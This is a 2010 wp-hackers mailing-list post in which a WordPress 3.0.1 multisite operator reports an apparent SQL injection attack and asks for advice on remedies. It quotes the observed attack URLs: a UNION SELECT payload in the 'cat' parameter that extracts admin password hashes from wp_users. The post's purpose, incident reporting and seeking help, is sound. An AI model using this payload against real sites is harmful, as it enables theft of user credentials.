[wp-hackers] WP 3.0.1 Multiple Sites -- SQL Injection Vulnerability
Chuck Harris
charrisjr at gmail.com
Wed Oct 6 17:59:02 UTC 2010
Hello:
Any experience with or insight regarding the following would be helpful.
Thank you in advance,
Chuck Harris
------------
We are experimenting with the new multiple sites feature in WP 3.x. We
recently discovered that our site has a SQL injection vulnerability. One of
the attack sequences was as follows:
http://our_site_url.org/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/*<http://our_site_url.org/index.php?cat=999+UNION+SELECT+null,CONCAT%28666,CHAR%2858%29,user_pass,CHAR%2858%29,666,CHAR%2858%29%29,null,null,null+FROM+wp_users+where+id=1/*>
When changing the 1 to a 2 and using the url:
http://our_site_url.org/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=2/*<http://our_site_url.org/index.php?cat=999+UNION+SELECT+null,CONCAT%28666,CHAR%2858%29,user_pass,CHAR%2858%29,666,CHAR%2858%29%29,null,null,null+FROM+wp_users+where+id=2/*>
Returns a custom 'Not Found' page. This change shows that the server is
returning different data based upon the results of the sql string it is
passed.
Has anyone else experienced similar? Is there a remedy? Should we be
concerned? We are currently searching log files to determine whether or not
the attack was successful.
More information about the wp-hackers
mailing list